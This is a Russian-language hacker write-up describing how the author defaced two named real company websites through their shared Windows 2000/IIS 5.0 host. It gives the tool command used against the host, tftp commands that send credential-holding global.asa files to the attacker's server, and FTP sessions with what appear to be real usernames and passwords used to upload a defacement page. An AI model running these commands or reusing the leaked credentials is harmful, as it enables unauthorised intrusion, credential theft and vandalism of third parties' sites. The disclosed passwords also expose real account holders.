Привет Перцы!

Сегодня я вам расскажу как был сделан deface на http://www.novellconsulting.com/ и http://nextage.co.uk/.
Все уже умненькие и знают что такое IIS unicode и с чем его едят... Прикол в том ,что когда вывесили на xakep`e результат deface
все вскричали , что быыыыыы!!! старая дыра... Ну да ладно, теперь подробнее о "старой дыре". И первый и второй сайт в реале хостятся через http://aerohost.com/, который работает под "всеми нами любимой" WIN2000/IIS5.0. Последний дыряв юникодно-безбожно, но на этом дырки кончаются? Нет дорогой друг, никак нет.

Если ты потелнетишься на этот чудо-сервак на 21,25,139,1433 порты, то у тебя появится много интересных мыслей помимо UniCodE (веб сервак в данном случае не имеет прав на запись в каталоги юзерей но имеет права на exec). Во первых в c:mssql7 стоит, понятно что:)), - MSSQL7 (который позволяет тебе получить interactive shell при наличии логина и пассы локального юзверя).

Oki Oki Oki. Как получить пассу?

Дубль №1 - ЮЗАЕМ ЗАНК и LinSQL7!

../iis-zank -t aerohost.com -i

В каталогe c:userswrachel есть клевый файл global.asa в котором и хранится имя юзверя и пасса. Далее tftp my_tftp_server PUT  c:userswrachelglobal.asa Получив файло, мы теперь можем шарахнуть LINSQL7 (прилагается)по серваку и делать свои делишки с правами SQL сервака.

Дубль №2 - Получаем  доступ к ftp

В каталогах c:usersrnovell & c:usersnextage тот же global.asa содержит данные ftp аккаунтов

tftp my_tftp_server PUT c:usersrnovellglobal.asa & tftp my_tftp_server PUT c:usersnextageglobal.asa

Далее ftp aerohost.com

login: rnovell
passwd: cnt134
put real.gif (наше лого)
put default.htm (наш IndeX файл)
quit

ftp aerohost.com
login: nextage
passwd: oakbridge
put real.gif (наше лого)
put default.htm (наш IndeX файл)
quit

Вот и все...

Автор: -=Sky12DooR=-